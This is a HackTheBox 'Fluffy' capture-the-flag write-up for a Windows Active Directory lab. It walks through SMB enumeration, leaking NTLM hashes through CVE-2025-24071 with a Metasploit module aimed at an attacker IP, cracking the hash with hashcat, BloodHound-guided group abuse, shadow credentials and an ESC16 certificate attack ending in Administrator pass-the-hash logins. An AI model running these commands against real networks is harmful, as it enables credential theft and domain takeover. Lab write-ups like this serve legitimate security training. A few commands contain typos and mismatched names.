RobeeDS Logo

robeeds

Cybersecurity,  HackTheBox,  Enumeration,  Privilege Escalation,  Active Directory ,  Windows

HackTheBox | Fluffy [Easy] Writeup

Author

robeeds

Date Published

HTB Fluffy hero image

Machine Information

As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

IP Address: 10.10.11.69


Guide:

Initial Setup

Just like any other HTB challenge, it is a good idea to make sure that your pentesting environment is up to date. 

1sudo apt-get update && sudo apt-get upgrade

Edit the hosts file

1sudo vim /etc/hosts

Add the following entry

110.10.11.69    fluffy.htb


Nmap Scan

Run an Nmap scan of your preference, or use the following (quick scan): 

1sudo nmap 10.10.11.69 -sS -sV

After a few minutes, the scan results in the following:

Nmap results for fluffy HTB challenge

From the results, we can see two notable services:
- Active Directory (port 389)
- SMB (ports 139/445)


SMB Enumeration

From the machine information, use the credentials ( j.fleischman / J0elTHEM4n1990! ) to list the available SMB shares

1smbclient -u 'j.fleischman' --password='J0elTHEM4n1990!' -L '\\10.10.11.69'

We receive the following:

smb shares HTB fluffy

From the results, we can see that there is an IT share. Given the context of the machine information, we might be able to assume that j.fleischman may be part of the IT department in this organization.


Connect to the IT share

1smbclient -u 'j.fleischman' --password='J0elTHEM4n1990!' '\\10.10.11.69\IT'

After gaining a successful connection and listing the files in the current directory, we see the following:

IT share smbclient HTB fluffy

There is a file Upgrade_Notice.pdf

Download this file

1get Upgrades.pdf


Opening a new tab in the terminal and going to the directory of the Upgrades.pdf file, we can view some metadata that may give us important information later down the road.

Exiftool output on Upgrades.pdf HTB fluffy

We can see that the author of the document is p.agila, most likely an important figure in the IT department.


Viewing the pdf file, we can see that it reveals the common vulnerabilities and exploits (CVE's) that we can use on the target machine.

CVEs HTB Fluffy

Doing some research on these CVE's and looking for proof of concepts, one stands out the most:

CVE-2025-24071


Executing Our First Exploit

Reference: Github


Clone the repository

1git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
2cd CVE-2025-24071-msfvenom

Copy the module into the Metasploit modules directory

1cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/

Load msfconsole and the module

1msfconsole
2use auxiliary/server/ntlm_hash

Set the required variables

1set ATTACKER_IP <YOUR_IP_ADDRESS>
2set FILENAME exploit.zip
3set LIBRARY_NAME malicious.library-ms
4set SHARE_NAME IT

Run the module

1run


Additionally, run Metasploit's SMB capture module

1use auxiliary/server/capture/smb
2set SRVHOST <YOUR_IP_ADDRESS>
3run


Upload the exploit file (in my case, I named it cvexploit.zip)

Upload of cvexploit to HTB fluffy


Waiting a few seconds, we see that p.agila's NTLM hashes are leaked

p.agila msfconsole nltm hashes HTB fluffy


Copying and pasting one of the hashes to a file, to later decrypt. 

1echo 'p.agila::FLUFFY:a4e506413250307f:ce0e18643b435b0148483a0d76de1307:010100000000000080b
2e16f213dbdb0146766e9df33f2785000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f
300550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f00550050000700080080be16f21
43dbdb0106000400020000000800300030000000000000000100000000200000ee673f1e7cf7d3ee14e059db2c06e3699e0c70ef3824cdb46a2d
541fc2f1eee6f0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e0
60360038000000000000000000
7' > p.agila_hash


Run Hashcat on the file

1Hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force


We get the following credentials!

p.agila:prometheusx-303


Enumerating Active Directory

Now that we've gained a basic foothold with another user's account, we can use BloodHound to analyze AD rights and relations, particularly the ones that we might be able to abuse.


Run neo4j

1sudo neo4j start

Run bloodhound

1sudo bloodhound


Log into BloodHound with your credentials. If you haven't set up BloodHound previously, refer to kali documentation.


Gather data for BloodHound

1bloodhound-python -d fluffy.htb -u p.agila -p promethesux-303 -ns 10.10.11.69. -c ALL


There will be a set of .json files in your directory. Upload them to BloodHound.


In BloodHound, we have the option to analyze the path from p.agila to high value targets, which displays the following node:

BloodHound analysis of p.agila


If we look closely, p.agila is a member of the Service Account Managers group. This group has GenericAll rights to the Service Accounts group. The Service Accounts Group contains the following:
- CA_SVC (Active Directory Certificate Authority)
- LDAP_SVC (Lightweight Directory Access protocol)
- WINRM_SVC (Windows Remote Management)


Privilege Escalation


In theory, with p.agila having access to the aforementioned service accounts, we could log in remotely to the target machine (winrm_svc), and maybe even use the active directory certificate authority (ca_svc) to impersonate other users.

To execute this, we can use BloodyAD to perform privilege escalation.


First, let's see what our group membership is under p.agila

1bloodyAD --host 10.10.11.69 -d fluffy.htb -u p.agila -p prometheusx-303 get membership p.agila

Results:

p.agila group membership HTB fluffy


Since p.agila is not a part of the Service Accounts group, we will need to add ourselves to this group.

1bloodyAD --host 10.10.11.69 -d fluffy.htb -u p.agila -p prometheusx-303 add groupMember ‘Service Accounts’ p.agila

We receive the output '[+] p.agila added to Service Accounts', indicating that we are now able to continue.


Recalling that the Service Accounts group has GenericWrite permissions over the service account domain users, we can check possible abuse paths in BloodHound.

Referring back to our BloodHound diagram, clicking on the GenericWrite relation,

GenericWrite permission Analysis HTB Fluffy

The possibility of a shadow credentials attack aligns with our previous idea to impersonate other users.


Here, we can use Certipy to request the authentication certificate of WINRM_SVC on behalf of p.agila. 

1certipy shadow auto -username 'p.agila@fluffy.htb' -p 'prometheusx-303' -account winrm_svc

This gives us the following output:

Certipy NT Hash Retrieval


We can now use this hash to log in to the target machine remotely, as WINRM_SVC.

One tool we can use to do this is Evil-WinRM. 

1evil-winrm -i 10.10.11.69 -u winrm_svc -H <HASH>

This provides us a remote connection to the target machine, and now we are able to navigate the machine as an actual user.

User flag HTB fluffy

Navigating to the Desktop directory, we find the user flag, which we can view using the cat command

1cat user.txt


Further Privilege Escalation

Now that we have the user flag, it's time to go for root. Looking back on how we have GenericWrite permission over the service account users, we might be able to further escalate our privileges through CA_SVC.


Context

The Certificate Authority is responsible for verifying the identity of users, computers, and organizations. Certificate templates can be used to simplify administering an AD CS certification authority. These templates are rulesets used to be applied against incoming certificate requests. If there is a misconfiguration in these templates, an attacker can possibly use this to gain greater privileges in a target system.


Certipy can be used to find misconfigurations in these templates, but before we do that, let's shadow CA_SVC's credentials. 

1certipy shadow auto -username 'winrm_svc@fluffy.htb' -hashes <WINRM_HASH> -account ca_svc
Shadow ca_svc results HTB fluffy


After getting the hash for CA_SVC, we now search for misconfigurations in the certificate templates. 

1certipy find -u 'ca_svc@fluffy.htb' -hashes <CA_SVC HASH> -dc-ip '10.10.11.69' -text -enabled -hide-admins


Certipy's output saves to a file, view that file for any flagged vulnerabilities

ESC16 flag ca_svc HTB fluffy

We see the following vulnerability:
ESC16: Security Extension disabled


Certipy's documentation shows how to exploit this

Steps:

1. Read the initial UPN of the victim account

1certipy account -u 'ca_svc@fluffy.htb' -hashes <CA_SVC HASH> -dc-ip '10.10.11.69' -user 'ca_svc' read

We get the following attributes:

ca_svc attributes HTB fluffy


2. Update the UPN of the victim account

1certipy account -u 'ca_svc@fluffy.htb' -hashes <CA_SVC HASH> -dc-ip '10.10.11.69' -upn 'Administrator' -user 'ca_svc' update
Updated UPN ca_svc HTB fluffy


3. Request the certificate for the administrator account

1certipy req -u 'Administrator' -hashes <CA_SVC HASH> -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Requested administrator certificate HTB fluffy


4. Restore the UPN of victim account

1certipy account -u 'ca_svc@fluffy.htb' -hashes <CA_SVC HASH> -dc-ip '10.10.11.69' -upn 'ca_svc' -user 'ca_svc' update


Authenticate as Admin

1certipy auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'Administrator' -domain 'fluffy.htb'
Admin hash HTB Fluffy


Using the hash of the admin, log in through Evil-WinRM

1evil-winrm -i 10.10.11.69 -u Administrator -H <ADMIN_HASH
Admin shell HTB fluffy


Now that we are logged in as the Admin, navigate around to find root flag

Root flag HTB fluffy
1cat root.txt


We have successfully rooted Fluffy!